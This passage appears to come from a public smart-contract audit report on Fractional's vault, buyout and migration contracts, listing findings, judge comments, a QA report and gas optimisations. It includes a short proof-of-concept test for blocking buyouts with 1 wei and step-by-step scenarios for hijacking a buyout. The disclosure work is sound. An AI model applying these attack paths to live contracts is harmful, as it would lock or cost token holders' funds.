uint256 shareAmount = (balanceContributedInEth * newTotalSupply) /
If Bob the msg.sender is a minority shareholder who contributed to Migration with say some technical enhancements of the Vault, not paying attention to the total supply reduction, his share can be lost on commit()
// Starts the buyout process
IBuyout(buyout).start{value: proposal.totalEth}(_vault);
As commit()
starts the Buyout, Bob will not be able to withdraw as both leave()
and withdrawContribution()
require INACTIVE state:
State required = State.INACTIVE;
if (current != required) revert IBuyout.InvalidState(required, current);
If Buyout be successful, Bob's share can be calculated as zero given his small initial share and reduction in the Vault total shares.
For example, if Bob's share together with the ETH funds he provided to Migration were cumulatively less than 1%, and new total supply is 100, he will lose all his contribution on commit()
as migrateFractions()
will send him nothing.
Consider requiring that the new total supply should be greater than the old one:
proposal.oldFractionSupply = IVaultRegistry(registry).totalSupply(
proposal.newFractionSupply = _newFractionSupply;
+ require(proposal.newFractionSupply > proposal.oldFractionSupply, ""); // reference version
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
A migration that changes the supply can result in some users losing their expected share of funds. I agree with Medium risk here since the terms are known and the community could aim to reject the migration if they don't agree with these changes.
Submitted by IllIllI, also found by 0x1f8b, 0x29A, Amithuddar, Avci, bardamu, BowTiedWardens, c3phas, cccz, codexploder, cryptphi, hake, horsefacts, hyh, Kthere, Limbooo, MEP, oyc_109, pashov, peritoflores, Ruhum, scaraven, simon135, slywaters, sseefried, StyxRave, tofunmi, TomJ, Treasure-Seeker, TrungOre, Tutturu, Waze, and xiaoming90
The use of payable.transfer()
is heavily frowned upon because it can lead to the locking of funds. The transfer()
call requires that the recipient has a payable
callback, only provides 2300 gas for its operation. This means the following cases can cause the transfer to fail:
- The contract does not have a
callback - The contract's
callback spends more than 2300 gas (which is only enough to emit something) - The contract is called through a proxy which itself uses up the 2300 gas
If a user falls into one of the above categories, they'll be unable to receive funds from the vault in a migration wrapper. Inaccessible funds means loss of funds, which is Medium severity.
Both leave()
File: src/modules/Migration.sol #1
159 uint256 ethAmount = userProposalEth[_proposalId][msg.sender];
160 proposal.totalEth -= ethAmount;
161 userProposalEth[_proposalId][msg.sender] = 0;
163 // Withdraws fractions from contract back to caller
164 IFERC1155(token).safeTransferFrom(
165 address(this),
166 msg.sender,
167 id,
168 amount,
169 ""
170 );
171 // Withdraws ether from contract back to caller
172 payable(msg.sender).transfer(ethAmount);
and withdrawContribution()
use payable.transfer()
File: src/modules/Migration.sol #2
320 // Temporarily store user's eth for the transfer
321 uint256 userEth = userProposalEth[_proposalId][msg.sender];
322 // Udpates ether balance of caller
323 userProposalEth[_proposalId][msg.sender] = 0;
324 // Withdraws ether from contract back to caller
325 payable(msg.sender).transfer(userEth);
While they both use msg.sender
, the funds are tied to the address that deposited them (lines 159 and 321), and there is no mechanism to change the owner of the funds to an alternate address.
Use address.call{value:x}()
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
After an unsuccessful migration, a multisig user (or other contract) may find their funds unrecoverable. Since a contract is able to enter a migration successfully and there is no way to specify an alternative send to address or migrate their escrowed funds to another account -- assets can be lost; as the warden points out here. I agree with Medium risk for this.
Submitted by 0xA5DF, also found by 0x52, 0xDjango, 0xsanson, async, berndartmueller, cccz, hubble, kenzo, Lambda, PwnedNoMore, Ruhum, scaraven, shenwilly, sseefried, Treasure-Seeker, xiaoming90, and xiaoming90
The underlying issue here is:
- A user can create a buyout with as little as 1 wei (which is basically nothing, it's worth about 1e-15 USD), without any fractions
- Once a buyout is created, nobody else can create another buyout on the same vault till the previous buyout ends (even if he'd like to offer a much higher price)
This leads to the fact that with as little as 1 wei a user can block a vault from holding a buyout for 4 days.
This can make the buyout module unavailable for a vault for days.
This can either be used in general, or to front-run and prevent a specific buyout offer.
I've added the following test to test/Buyout.t.sol
, and it passes (i.e. the bug exists)
function testStartWith1Wei_bug() public {
initializeBuyout(alice, bob, TOTAL_SUPPLY, 0, true);
// bob holds zero fractions, and can still start a buyout
assertEq(getFractionBalance(bob.addr), 0);
// Bob starts a buyout with as little as 1 wei
// almost 4 days have passed but Alice still
// can't start a buyout till Bob's buyout ends
vm.warp(block.timestamp + 3.9 days);
// the next call would revert with the `invalid state` error
// Alice can't start a buyout till eve's buyout ends
alice.buyoutModule.start{value: 1 ether}(vault);
While a buyout is running - allow other users to offer a higher buyout
- This can either be a continuation of the previous buyout, or start a new one with proposal/rejection period starting form the current time.
- In case it restarts the buyout - you'd might want to require a minimum increase from the previous buyout price (e.g. 5% more than the previous one), in order to prevent a buyout from running forever
Alternately, you can require a user to hold a minimum percent of fractions to start a buyout, this way if the offer is unrealistically low - the user would loose his fractions. Effectively putting a price tag for DoS-ing a vault.
aklatham (Fractional) confirmed
HardlyDifficult (judge) commented:
Unrealistic proposals can prevent legit offers from being made for a period of time, and that can be repeated to attempt to DOS. Agree with the warden's severity of Medium risk since there is an opportunity for the legit proposal to be included after the griefing one expires.
Selecting this instance as the primary for including a clear coded POC.
For this contest, 97 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by xiaoming90 received the top score from the judge.
The following wardens also submitted reports: IllIllI, 0x1f8b, 0xsanson, scaraven, jonatascm, BowTiedWardens, horsefacts, sashik_eth, 0x29A, kyteg, chatch, Kaiziron, shenwilly, Sm4rty, Deivitto, robee, cccz, 0xNineDec, TrungOre, mektigboy, joestakey, unforgiven, berndartmueller, 0xA5DF, oyc_109, 0xf15ers, 242, simon135, TomJ, MEP, 0xDjango, kebabsec, hake, hansfriese, pashov, codexploder, aysha, Treasure-Seeker, 0xsolstars, dy, 8olidity, sorrynotsorry, bbrho, _Adam, zzzitron, Hawkeye, Kulk0, Kumpa, 141345, apostle0x01, Tomio, asutorufos, sach1r0, 0xNazgul, fatherOfBlocks, rbserver, async, c3phas, ayeslick, benbaessler, s3cunda, cryptphi, delfin454000, Bnke0x0, dipp, rajatbeladiya, ElKu, exd0tpy, sahar, peritoflores, David_, rokinot, cloudjunky, Amithuddar, Funen, Viksaa39, hubble, 0x52, kenzo, Lambda, neumo, ReyAdmirado, Ruhum, sseefried, Tutturu, svskaushik, Keen_Sheen, JC, Rohan16, Waze, z3s, ak1, Aymen0909, durianSausage, pedr02b2, and Kthere.
In summary, the code quality of the Fractional was found to be high. The codes were also found to be well-documented and the team took the efforts to document the NatSpec for all the functions within the contracts. As a result, it is easy for the reader to understand the overall architecture and design of the system. However, some minor errors within the comments were observed. Although it does not cause any technical issues or result in a loss of fund, it is recommended for the team to review them and update them accordingly to ensure that the documentation reflects what the system does accurately.
Further improvement to the code readability can be made by using a modifier, refer to the "Use modifier for better readability and code reuse" below. Another key concern that is the functions within the Supply
and Transfer
contracts are implemented entirely in assembly. Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code. Consider eliminating all assembly code and re-implement them in Solidity to make the code significantly more clean.
Test coverage was found to be high. All the key features were found to be covered in the test.
Fractional allows vault owners to install custom plugins to extend the functionality of the vault during or after deployment. The plugins within the vault could theoretically perform any task such as transferring the asset from the vault to an arbitrary wallet address or minting any amount of new fractional tokens. Therefore, it is critical for the fractional token holders of a vault to be aware of this risk and the token holders must ensure that the vault owner is trustworthy.
Under normal circumstances, the vault owner will be Fractional's VaultRegistry
contract, which does not pose much of an issue because VaultRegistry
contract is considered a trusted entity within Fractional protocol. However, potential fractional token investors should take note that some vaults can be created via VaultRegistry.createFor
, which will transfer the ownership of the vault to an arbitrary address. In such a case, potential investors must ensure that the new vault owner is trustworthy enough not to perform a rug pull or steal the assets in the vault.
Consider documenting this risk if needed so that potential fractional token holders can make an informed decision.
Both the Buyout
and Migration
modules depend heavily on the state of the vault (e.g. INACTIVE, LIVE, SUCCESS) to determine if a function can be executed at any point in time. For instance, a buyout can only be started only if the vault state is "INACTIVE", or a migration can only be settled if the vault state is "SUCCESS".
A module changing the vault state might cause unintended behavior in another module. For instance, when a buyer starts an auction within the Buyout
module, it will cause the vault state to change to State.LIVE
. As a result, it will cause contributors of a proposal within the Migration
module to be unable to withdraw their contributed assets from the proposal because the Migration.withdrawContribution
function requires the vault state to be State.INACTIVE
. Thus, contributor assets are stuck in the Migration
contract whenever a buyer starts an auction in the Buyout
It is recommended to take extra caution when writing the module to ensure that it does not accidentally block the functionality of another module.
To ensure that the vault operates in an expected manner, it is important that the contracts prevent users from calling functions in an out-of-order manner or bypassing certain step in a process. It was observed that it is possible for users to call the function in an out-of-order manner or bypass certain step in a process entirely. Following illustrates some of the examples:
- A user can call
follow byMigration.migrateFractions
, thus skipping theMigration.settleFractions
- A contributor should call
to leave a proposed migration to get back their asset if the proposal has not been committed yet. However, instead of callingMigration.leave
, the contributor can choose to callMigration.withdrawContribution
which will succeed without any revert.
Ensure that the sequence in a process (e.g. buyout or migration process) is strictly followed and enforced.
The key features of the protocols were found to be following the "Checks Effects Interactions" pattern rigorously, which helps to prevent any possible re-entrancy attack. So far no re-entrancy attack that can lead to loss of asset was observed during the contest. However, further improvements can be made to guard against future re-entrancy attacks in case any attack vector is missed out by C4's wardens during the contest.
A number of key functions within Buyout
and Migration
modules deal with ERC1155, which contains a hook that will make a callback to the recipient whenever a transfer occurs, thus increasing the risk of a re-entrancy attack. Refer to the "Lack Of Reentrancy Guards" issue for more details.
Thus, it would be prudent to implement additional reentrancy prevention wherever possible by utilizing the nonReentrant
modifier from Openzeppelin Library to block possible re-entrancy as a defense-in-depth measure.
Although input validation has been already implemented in the majority of the functions, it can be further strengthened to thwart potential attacks or prevent unexpected behavior in the future. For instance, Vault.transferOwnership
does not check if the ownership is being transferred to address(0)
, which might affect the functionality of the vault.
Whenever IERC1155(token).safeTransferFrom
is called, the to
address can re-enter back to the contracts due to the ERC1155TokenReceiver(to).onERC1155Received(msg.sender, from, id, amount, data)
code (hook)
function safeTransferFrom(
address from,
address to,
uint256 id,
uint256 amount,
bytes calldata data
) public virtual {
require(msg.sender == from || isApprovedForAll[from][msg.sender], "NOT_AUTHORIZED");
balanceOf[from][id] -= amount;
balanceOf[to][id] += amount;
emit TransferSingle(msg.sender, from, to, id, amount);
to.code.length == 0
? to != address(0)
: ERC1155TokenReceiver(to).onERC1155Received(msg.sender, from, id, amount, data) ==
The following functions utilise IERC1155(token).safeTransferFrom
that allows the caller or proposer to re-enter back to the contracts
Apply necessary reentrancy prevention by utilizing the OpenZeppelin's nonReentrant modifier to block possible re-entrancy.
Functions should be called in the following sequence to migrate a vault after a successful buyout.
- Create new vault -
- Mint new fractional tokens to new vault -
- Give investors the new fractional token
However, a user can call Migration.settleVault
follow by Migration.migrateFractions
, thus skipping the Migration.settleFractions
Although it does not result in any loss of asset, allowing users to call the functions pertaining to migration in an out-of-order manner might cause unintended consequence in the future.
After the Migration.settleFractions
has been executed, the migrationInfo[_vault][_proposalId].fractionsMigrated
will be set to true
function settleFractions(
address _vault,
uint256 _proposalId,
bytes32[] calldata _mintProof
) external {
migrationInfo[_vault][_proposalId].fractionsMigrated = true;
Within the Migration.migrateFractions
function, check that migrationInfo[_vault][_proposalId].fractionsMigrated == true
to ensure that the Migration.settleFractions
has been executed.
function migrateFractions(address _vault, uint256 _proposalId) external {
+ // Fractional tokens must be minted first before migrating
+ require(migrationInfo[_vault][_proposalId].fractionsMigrated, "Fractional token not minted yet");
// Reverts if address is not a registered vault
(, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
if (id == 0) revert NotVault(_vault);
// Reverts if buyout state is not successful
(, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(
State required = State.SUCCESS;
if (current != required) revert IBuyout.InvalidState(required, current);
// Reverts if proposer of buyout is not this contract
if (proposer != address(this)) revert NotProposalBuyout();
All plugins' functions within the vault can be called by any public user. If the plugins contain any unprotected privileged functions, it can be called by malicious user.
/// @dev Callback for handling plugin transactions
/// @param _data Transaction data
/// @return response Return data from executing plugin
// prettier-ignore
fallback(bytes calldata _data) external payable returns (bytes memory response) {
address plugin = methods[msg.sig]; // @audit-issue what if we have the diff contract with same function name? Collision?
(,response) = _execute(plugin, _data);
Include a warning in the comments or documentation so that the vault owner is aware that any plugin's function added can be called by the public users. Vault owners should ensure that plugin's functions have the necessary access control in place so that only authorised users can trigger the functions.
If a user accidentally sent ether to the Vault
contract, the ether will be stuck in the vault with no way to retrieve them.
/// @dev Callback for receiving Ether when the calldata is empty
receive() external payable {}
Consider if there is a need for the Vault
contract to receive ethers. Otherwise, remove it.
It was observed that the vault owner can transfer the ownership to address(0)
, which effectively burn the ownership.
/// @notice Transfers ownership to given account
/// @param _newOwner Address of new owner
function transferOwnership(address _newOwner) external {
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
owner = _newOwner;
emit TransferOwnership(msg.sender, _newOwner);
It is recommended to implement a validation check to ensure that the ownership is not transferred to address(0)
function transferOwnership(address _newOwner) external {
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
+ require(_newOwner != 0, "Invalid new owner: address(0)");
owner = _newOwner;
emit TransferOwnership(msg.sender, _newOwner);
The Vault.install
function did not validate that the length of _selectors
and _plugins
arrays is the same. If the array length is different, it might cause unexpected behavior.
/// @notice Installs plugin by setting function selector to contract address
/// @param _selectors List of function selectors
/// @param _plugins Addresses of plugin contracts
function install(bytes4[] memory _selectors, address[] memory _plugins)
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
uint256 length = _selectors.length;
for (uint256 i = 0; i < length; i++) {
methods[_selectors[i]] = _plugins[i];
emit InstallPlugin(_selectors, _plugins);
It is recommended to implement validation to ensure that the length of _selectors
and _plugins
arrays is the same.
function install(bytes4[] memory _selectors, address[] memory _plugins)
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
+ require(_selectors.length == _plugins.length, "Length of selectors and plugins is not the same");
uint256 length = _selectors.length;
for (uint256 i = 0; i < length; i++) {
methods[_selectors[i]] = _plugins[i];
emit InstallPlugin(_selectors, _plugins);
Owner can calls Vault.transferOwnership
function to transfers the ownership to the new address directly. As such, there is a risk that the ownership is transferred to an invalid address, thus causing the contract to be without a owner.
/// @notice Transfers ownership to given account
/// @param _newOwner Address of new owner
function transferOwnership(address _newOwner) external {
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
owner = _newOwner;
emit TransferOwnership(msg.sender, _newOwner);
Controller can calls ERC1155.transferController
function to transfers the controller role to the new address directly. As such, there is a risk that the ownership is transferred to an invalid address, thus causing the contract to be without a controller.
/// @notice Updates the controller address for the FERC1155 token contract
/// @param _newController Address of new controlling entity
function transferController(address _newController)
if (_newController == address(0)) revert ZeroAddress();
_controller = _newController;
emit ControllerTransferred(_newController);
Consider implementing a two step process where the owner or controller nominates an account and the nominated account needs to call an acceptOwnership()
function for the transfer of admin to fully succeed. This ensures the nominated EOA account is a valid and active account.
function should only be callable if the buyout initiated by the migration proposal is successful. However, it was observed that it is possible to call Migration.settleVault
successfully even though the buyout initiated by the migration proposal has failed.
The following aims to demonstrate the issue:
- Alice (attacker) creates a migration proposal by calling
function. Then, she callsMigration.commit
to kick off the buyout process for the migration, and Alice's proposal'sisCommited
is set totrue
. - Alice's buyout is unsuccessful. At this point in time, note that Alice's proposal's
still remains astrue
, and the vault state reverts back toState.INACTIVE
. - In order for the
function to run successfully, the following three (3) requirements must be met:- 1st requirement - Proposal must be committed
- 2nd requirement - Vault state must be set to
- 3rd requirement -
must not be initialised, which means that new vault has not been deployed yet
- If Alice attempts to call
function, it will revert because the vault state is not set toState.SUCCESS
due to the failed buyout. In summary, her migration proposal meets all the requirements except for the 2nd requirement. - Bob decides to buy out the NFTs in the vault, therefore, he calls the
to kick start the auction. After the buyout period (4 days), the vault pool has more than 51% of the total supply, thus the buyout is successful. - Bob proceeds to call the
to end the auction. Since the buyout is successful, the vault state is set toState.SUCCESS
now. - Alice decided to hijack Bob's buyout. Therefore, immediately after Bob called the
function, Alice calls theMigration.settleVault
function. - Alice's
function call will succeed this time because the vault state has been set tostatus.SUCCESS
This attack does not lead to loss of asset. Thus, I'm marking this as "Low". Even though the migration proposal has settled the vault successfully, when Alice calls Migration.migrateVaultERC[20|721|1155]
, it will revert because the Buyout.withdrawERC[20|721|1155]
will detect that the caller (Migration
module) is not the actual auction winner.
However, Migration.settleVault
function could still be called successfully in a situation where it should be failing, thus it is something to be raised.
Ensure that the Migration.settleVault
can only be called if the buyout initiated by the migration proposal (within Migration.commit
) has succeeded.
The Vault.install
function sets the 4 bytes function selector as the index of the methods
If there are two plugins with the same function name and parameter types, the second plugin will overwrite the first plugin.
/// @notice Mapping of function selector to plugin address
mapping(bytes4 => address) public methods;
/// @notice Installs plugin by setting function selector to contract address
/// @param _selectors List of function selectors
/// @param _plugins Addresses of plugin contracts
function install(bytes4[] memory _selectors, address[] memory _plugins)
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
uint256 length = _selectors.length;
for (uint256 i = 0; i < length; i++) {
methods[_selectors[i]] = _plugins[i];
emit InstallPlugin(_selectors, _plugins);
Assume that the following two plugins and their function need to be installed:
- Contract =
, function =transfer(address,uint256)
, function selector =a9059cbb
- Contract =
, function =transfer(address,uint256)
, function selector =a9059cbb
Therefore, _selectors
array will be [a9059cbb, a9059cbb]
, and _plugins
array will be [ABC, XYZ]
Passing the above _selectors
and _plugins
arrays into the Vault.install
function will cause the ABC.transfer(address,uint256)
function to be overwritten by XYZ.transfer(address,uint256)
When calling methods[a9059cbb]
, it will only return the second plugin which is XYZ
contract. Thus, ABC.transfer(address,uint256)
will not be callable within the vault.
This might potentially cause the asset to be stuck in the vault or cause key functionalities within the vault to be unusable due to missing plugin functions.
It is recommended to revert the Vault.install
transaction if the callers attempt to install two plugins with the same function selector so that they are aware of this "overwriting" issue. Additional comments can be added to warn the caller about this issue or inform the caller that all function selectors must be unique across all plugins.
Consider implementing the following validation check so that plugin's function will not be accidentally overwritten.
function install(bytes4[] memory _selectors, address[] memory _plugins)
if (owner != msg.sender) revert NotOwner(owner, msg.sender);
uint256 length = _selectors.length;
for (uint256 i = 0; i < length; i++) {
+ // If the selector has already been set, revert to prevent existing plugin's function to be overwritten
+ if (methods[_selectors[i]] != 0) revert SelectorCannotBeOverwritten();
methods[_selectors[i]] = _plugins[i];
emit InstallPlugin(_selectors, _plugins);
Per the code of Buyout.end
function, the buyout is successful if the vault holds more than 50% of the fractional tokens.
function end(address _vault, bytes32[] calldata _burnProof) external {
// Reverts if current time is less than or equal to end time of auction
uint256 endTime = startTime + REJECTION_PERIOD;
if (block.timestamp <= endTime)
revert TimeNotElapsed(block.timestamp, endTime);
uint256 tokenBalance = IERC1155(token).balanceOf(address(this), id);
// Checks totalSupply of auction pool to determine if buyout is successful or not
if (
(tokenBalance * 1000) /
IVaultRegistry(registry).totalSupply(_vault) >
) {
However, a large shareholder who owns 51% of the fractional tokens can send all his tokens to address(0)
, which effectively burns 51% of the fraction tokens.
In this case, the NFT held within the vault is locked forever. There is no way to retrieve the NFT because it is impossible for a buyout to be successful as the vault can never hold more than 50% percent of the fractional tokens even if all the existing fractional token holders sell their tokens to the vault since 51% of them have already been sent to address(0)
The NFT and its fractional tokens lose their utility entirely when this event happens. For example, for a fractional token, no one would be able to display it in galleries in the metaverse. Additionally, fractional tokens of a locked NFT will be deemed as worthless in the open market.
Consider an alternative buyout mechanism that is less reliant on the number of tokens being held by the vault to determine whether a buyout is successful or not.
The vault creation only supports up to six (6) hashed permissions within a vault.
The following shows that the number of hashed permission (or leaf nodes) is hardcoded to six (6). The new bytes32[](6);
code initialises the hashes
array with 6 empty items within the baseVault.generateMerkleTree
Thus, if there are more than six (6) permissions, the hashes
array will overflow and the transaction will revert.
/// @notice Generates a merkle tree from the hashed permission lists of the given modules
/// @param _modules List of module contracts
/// @return hashes A combined list of leaf nodes
function generateMerkleTree(address[] calldata _modules)
returns (bytes32[] memory hashes)
uint256 counter;
hashes = new bytes32[](6);
unchecked {
for (uint256 i; i < _modules.length; ++i) {
bytes32[] memory leaves = IModule(_modules[i]).getLeafNodes();
for (uint256 j; j < leaves.length; ++j) {
hashes[counter++] = leaves[j];
Assume that Alice calls the baseVault.deployVault
with the following module settings:
- Module A - 5 functions (or 5 leaf nodes)
- Module B - 1 function (or 1 leaf nodes)
- Module C - 3 functions (or 3 leaf nodes)
Thus, the actual call will be as follows:
baseVault.deployVault(1000, [Module A, Module B, Module C], [], [], mintProof)
When Alice calls baseVault.deployVault
with the above three (3) modules, the hashes
array will overflow and the transaction will revert.
/// @notice Deploys a new Vault and mints initial supply of fractions
/// @param _fractionSupply Number of NFT Fractions minted to control the vault
/// @param _modules The list of modules to be installed on the vault
/// @param _plugins Addresses of plugin contracts
/// @param _selectors List of function selectors
/// @param _mintProof List of proofs to execute a mint function
function deployVault(
uint256 _fractionSupply,
address[] calldata _modules,
address[] calldata _plugins,
bytes4[] calldata _selectors,
bytes32[] calldata _mintProof
) external returns (address vault) {
bytes32[] memory leafNodes = generateMerkleTree(_modules);
bytes32 merkleRoot = getRoot(leafNodes);
vault = IVaultRegistry(registry).create(
emit ActiveModules(vault, _modules);
_mintFractions(vault, msg.sender, _fractionSupply, _mintProof);
The vault creation only supports up to six (6) hashed permission within a vault, thus limiting the functionality of the vault and restricting the expandability of the vault.
It is recommended not to hardcode the array size (6 in this case) for the hashes
array within the baseVault.generateMerkleTree
function to provide more flexibility to the vault creator.
Considering calculating the total number of leaf nodes first before initialising the hashes
Visibility is not set for the token
state variable.
/// @title Metadata
/// @author Fractional Art
/// @notice Utility contract for storing metadata of an FERC1155 token
contract Metadata {
/// @notice Address of FERC1155 token contract
address immutable token;
/// @title Supply
/// @author Fractional Art
/// @notice Reference implementation for the optimized Supply target contract
contract SupplyReference is ISupply {
/// @notice Address of VaultRegistry contract
address immutable registry;
It is best practice to set the visibility of state variables explicitly. The default visibility for "token" is internal. Other possible visibility settings are public and private.
The comment mentioned that if a pool has more than 51% of the total supply after 4 days, the buyout is successful.
/// @title Buyout /// @author Fractional Art /// @notice Module contract for vaults to hold buyout pools /// - A fractional owner starts an auction for a vault by depositing any amount of ether and fractional tokens into a pool. /// - During the proposal period (2 days) users can sell their fractional tokens into the pool for ether. /// - During the rejection period (4 days) users can buy fractional tokens from the pool with ether. /// - If a pool has more than 51% of the total supply after 4 days, the buyout is successful and the proposer
However, based on the actual implementation, the buyout will be successful as long as the pool has more than 50% of the total supply.
uint256 tokenBalance = IERC1155(token).balanceOf(address(this), id);
// Checks totalSupply of auction pool to determine if buyout is successful or not
if (
(tokenBalance * 1000) /
IVaultRegistry(registry).totalSupply(_vault) >
Update the comment to clearly reflect the actual implementation.
/// @title Buyout
/// @author Fractional Art
/// @notice Module contract for vaults to hold buyout pools
/// - A fractional owner starts an auction for a vault by depositing any amount of ether and fractional tokens into a pool.
/// - During the proposal period (2 days) users can sell their fractional tokens into the pool for ether.
/// - During the rejection period (4 days) users can buy fractional tokens from the pool with ether.
-/// - If a pool has more than 51% of the total supply after 4 days, the buyout is successful and the proposer
+/// - If a pool has more than 50% of the total supply after 4 days, the buyout is successful and the proposer
The comment mentioned that the FERC1155.royaltyInfo
function is to set the token royalties. However, the actual implementation is to read the token royalties.
/// @notice Sets the token royalties
/// @param _id Token ID royalties are being updated for
/// @param _salePrice Sale price to calculate the royalty for
function royaltyInfo(uint256 _id, uint256 _salePrice)
returns (address receiver, uint256 royaltyAmount)
receiver = royaltyAddress[_id];
royaltyAmount = (_salePrice * royaltyPercent[_id]) / 100;
Update the comment to clearly reflect the actual implementation.
-/// @notice Sets the token royalties
+/// @notice Reads the token royalties
/// @param _id Token ID royalties are being updated for
/// @param _salePrice Sale price to calculate the royalty for
function royaltyInfo(uint256 _id, uint256 _salePrice)
returns (address receiver, uint256 royaltyAmount)
receiver = royaltyAddress[_id];
royaltyAmount = (_salePrice * royaltyPercent[_id]) / 100;
To improve readability and code reuse, a onlyOwner
modifer can be defined instead of performing a manual conditional check if (owner != msg.sender) revert NotOwner(owner, msg.sender);
within the following affected functions:
It is recommended to define a modifier for access control and use it consistently throughout the codebase.
Following illustrates an example of the changes made to Vault.setMerkleRoot
modifier modifier onlyOwner { {
if (owner == msg.sender) {
+ function setMerkleRoot(bytes32 _rootHash) external onlyOwner {
- function setMerkleRoot(bytes32 _rootHash) external {
- if (owner != msg.sender) revert NotOwner(owner, msg.sender);
merkleRoot = _rootHash;
The following functions were implemented in assembly:
Supply .mint
Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code.
Consider eliminating all assembly code and re-implement them in Solidity to make the code significantly more clean.
The purpose of the nonce
is to ensure that the Vault.init
function is only called once. Consider renaming it to isInit
for better readability.
/// @dev Initializes nonce and proxy owner
function init() external {
if (nonce != 0) revert Initialized(owner, msg.sender, nonce);
nonce = 1;
owner = msg.sender;
emit TransferOwnership(address(0), msg.sender);
HardlyDifficult (judge) commented:
This is an awesome report!
stevennevins (Fractional) commented:
This is a high quality warden! Their other findings stood out to us as well.
For this contest, 76 reports were submitted by wardens detailing gas optimizations. The report highlighted below by joestakey received the top score from the judge.
The following wardens also submitted reports: IllIllI, 0x1f8b, c3phas, 0x29A, 0xA5DF, m_Rassska, 0xKitsune, hrishibhat, _Adam, hyh, MEP, TomJ, ReyAdmirado, 0xsanson, Funen, gogo, Bnke0x0, JC, 0xkatana, ajtra, RedOneN, sashik_eth, Waze, ElKu, simon135, jonatascm, giovannidisiena, TrungOre, 0xalpharush, BowTiedWardens, brgltd, robee, rbserver, Limbooo, apostle0x01, ignacio, PwnedNoMore, Tomio, 141345, 0xNazgul, benbaessler, fatherOfBlocks, kyteg, Ruhum, codexploder, Saintcode_, Sm4rty, horsefacts, oyc_109, Deivitto, delfin454000, Kaiziron, Rohan16, rokinot, Chom, durianSausage, Fitraldys, mektigboy, sach1r0, Tutturu, 8olidity, cryptphi, jocxyen, karanctf, kebabsec, Lambda, pedr02b2, slywaters, djxploit, 0xNineDec, 0xsolstars, asutorufos, Avci, dharma09, and NoamYakov.
It wastes gas to read an array's length in every iteration of a for
loop, even if it is a memory or calldata array: 3
gas per read.
8 instances:
454: for (uint256 i; i < permissions.length; )
64: for (uint256 i = 0; i < _tokens.length; )
83: for (uint256 i = 0; i < _tokens.length; )
107: for (uint256 i = 0; i < _tokens.length; ++i)
130: for (uint256 i; i < _modules.length; ++i)
132: for (uint256 j; j < leaves.length; ++j)
51: for (uint256 i = 0; i < _proof.length; ++i)
110: for (uint256 i; i < result.length; ++i)
Caching the length in a variable before the for
If the string can fit into 32 bytes, then bytes32
is cheaper than string
. string
is a dynamically sized-type, which has current limitations in Solidity compared to a statically sized variable.
2 instances:
15: string public constant NAME = "FERC1155";
15: string public constant VERSION = "1";
Replace string constant
with bytes(1..32) constant
Anytime you are reading from storage more than once, it is cheaper in gas cost to cache the variable: a SLOAD cost 100gas, while MLOAD and MSTORE cost 3 gas.
In particular, in for
loops, when using the length of a storage array as the condition being checked after each loop, caching the array length can yield significant gas savings if the array length is high
15 instances:
scope: end()
is read twice:
186: (address token, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
210: IVaultRegistry(registry)
scope: cash()
is read twice:
246: (address token, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
267: uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
scope: redeem()
is read twice:
280: (, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
288: uint256 totalSupply = IVaultRegistry(registry).totalSupply(_vault);
scope: getPermissions()
is read twice:
476: supply,
477: ISupply(supply).burn.selector
is read 8 times:
482: transfer,
483: ITransfer(transfer).ERC20Transfer.selector
488: transfer,
489: ITransfer(transfer).ERC721TransferFrom.selector
494: transfer,
495: ITransfer(transfer).ERC1155TransferFrom.selector
500: transfer,
501: ITransfer(transfer).ERC1155BatchTransferFrom.selector
scope: propose()
is read twice:
81: (, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
95: proposal.oldFractionSupply = IVaultRegistry(registry).totalSupply(_vault);
scope: commit()
is read twice:
184: (address token, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault);
200: IVaultRegistry(registry).totalSupply(_vault)
is read twice in the conditionnalif
208: IFERC1155(token).setApprovalFor(address(buyout), id, true)
210: IBuyout(buyout).start{value: proposal.totalEth}(_vault);
scope: settleVault()
is read twice:
232: bytes32[] memory merkleTree = generateMerkleTree(proposal.modules);
247: proposal.modules
is read twice:
237: proposal.plugins
248: proposal.plugins
is read twice:
238: proposal.selectors
249: proposal.selectors
scope: settleFractions()
is read twice:
273: proposal.newVault
283: proposal.newVault
is read twice:
275: proposal.newFractionSupply
285: proposal.newFractionSupply
scope: migrateFractions()
is read 3 times:
435: (, uint256 id) = IVaultRegistry(registry).vaultToToken(_vault)
467: (address token, uint256 newFractionId) = IVaultRegistry(registry)
470: uint256 newTotalSupply = IVaultRegistry(registry).totalSupply(newVault)
is read twice:
438: (, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(_vault)
447: (, , , , , uint256 lastTotalSupply) = IBuyout(buyout).buyoutInfo(_vault);
Cache these storage variables using local variables.
Anytime you are reading from a mapping value more than once, it is cheaper in gas cost to cache it, by saving one gkeccak256
operation - 30
1 instance:
scope: uri()
is read twice:
297: require(metadata[_id] != address(0), "NO METADATA");
298: return IFERC1155(metadata[_id]).uri(_id)
Cache these mapping accesses using local variables.
If a reference type function parameter is read-only, it is cheaper in gas to use calldata instead of memory.
Calldata is a non-modifiable, non-persistent area where function arguments are stored, and behaves mostly like memory,but it alleviates the compiler from the abi.decode()
step that copies each index of the calldata to the memory index, each iteration costing 60
20 instances:
68: function emitSetURI(uint256 _id, string memory _uri)
73: function install(bytes4[] memory _selectors, address[] memory _plugins)
101: function uninstall(bytes4[] memory _selectors)
53: address[] memory _plugins
54: bytes4[] memory _selectors
70: address[] memory _plugins
71: bytes4[] memory _selectors
85: address[] memory _plugins
86: bytes4[] memory _selectors
105: address[] memory _plugins
106: bytes4[] memory _selectors
150: address[] memory _plugins
